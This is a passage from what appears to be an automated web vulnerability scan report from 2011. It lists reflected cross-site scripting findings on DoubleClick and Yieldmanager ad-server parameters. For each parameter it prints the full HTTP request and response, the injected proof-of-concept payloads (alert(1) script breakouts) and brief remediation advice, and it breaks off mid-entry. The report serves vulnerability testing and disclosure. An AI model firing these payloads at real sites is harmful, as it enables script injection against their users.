GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e566b"-alert(1)-"9a7ddde7086&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e566b"-alert(1)-"9a7ddde7086&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&even
...[SNIP]...

2.30. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27907"-alert(1)-"2bb12fa9372 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24327907"-alert(1)-"2bb12fa9372&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24327907"-alert(1)-"2bb12fa9372&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250
...[SNIP]...

2.31. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6fcc"-alert(1)-"b32620849b2 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330a6fcc"-alert(1)-"b32620849b2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330a6fcc"-alert(1)-"b32620849b2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_
...[SNIP]...

2.32. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64942"-alert(1)-"d331bee272d was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=51371764942"-alert(1)-"d331bee272d&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
et/click%3Bh%3Dv8/3b05/17/14b/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=51371764942"-alert(1)-"d331bee272d&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg
...[SNIP]...

2.33. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20cf0"-alert(1)-"da21d5ca8f4 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=220cf0"-alert(1)-"da21d5ca8f4&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=220cf0"-alert(1)-"da21d5ca8f4&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27
...[SNIP]...

2.34. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5db2"-alert(1)-"f4687176ca0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041b5db2"-alert(1)-"f4687176ca0&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3b05/17/14b/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041b5db2"-alert(1)-"f4687176ca0&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.
...[SNIP]...

2.35. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d73dc"-alert(1)-"0d4d57175ea was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52d73dc"-alert(1)-"0d4d57175ea&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52d73dc"-alert(1)-"0d4d57175ea&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_NA_300X250_A");
var fsc
...[SNIP]...

2.36. http://ad.doubleclick.net/adj/pcw.main.blogs/bizfeed/index [blg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pcw.main.blogs/bizfeed/index

Issue detail

The value of the blg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 523bc'%3balert(1)//b3b035e5bf1 was submitted in the blg parameter. This input was echoed as 523bc';alert(1)//b3b035e5bf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/pcw.main.blogs/bizfeed/index;blg=523bc'%3balert(1)//b3b035e5bf1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/blogs/id,61/bizfeed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6190
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:32:05 GMT
Expires: Thu, 12 May 2011 13:32:05 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<VAST version=\"2.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"vast.xsd\"
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;239708791;0-0;0;31663029;426/240;41597265/41615052/1;;~aopt=2/1/64/0;~okv=;blg=523bc';alert(1)//b3b035e5bf1;bsg=102491;bsg=104070;bsg=106172;bsg=102971;bsg=103565;bsg=103910;bsg=104468;bsg=104635;bsg=110475;bsg=110477;bsg=110478;bsg=110799;bsg=110802;bsg=110821;bsg=110021;;~cs=c%3fhttp://s0.2mdn.net/dot.gif
...[SNIP]...

2.37. http://ad.doubleclick.net/adj/pcw.main.news/products/computers/laptops/article [blg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pcw.main.news/products/computers/laptops/article

Issue detail

The value of the blg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b38c'%3balert(1)//7e42ef4a333 was submitted in the blg parameter. This input was echoed as 1b38c';alert(1)//7e42ef4a333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/pcw.main.news/products/computers/laptops/article;blg=1b38c'%3balert(1)//7e42ef4a333 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6190
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:28:56 GMT
Expires: Thu, 12 May 2011 13:28:56 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<VAST version=\"2.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"vast.xsd\"
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;239708791;0-0;0;28183100;426/240;41597265/41615052/1;;~aopt=2/1/64/0;~okv=;blg=1b38c';alert(1)//7e42ef4a333;bsg=102491;bsg=104070;bsg=106172;bsg=102971;bsg=103565;bsg=103910;bsg=104468;bsg=104635;bsg=110475;bsg=110477;bsg=110478;bsg=110799;bsg=110802;bsg=110821;bsg=110021;;~cs=y%3fhttp://s0.2mdn.net/dot.gif
...[SNIP]...

2.38. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d2b"><script>alert(1)</script>8aa7f7337f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=621649&65d2b"><script>alert(1)</script>8aa7f7337f5=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:32 GMT
Pragma: no-cache
Content-Length: 4687
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?65d2b"><script>alert(1)</script>8aa7f7337f5=1&Z=728x90&s=621649&t=2" target="_parent">
...[SNIP]...

2.39. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

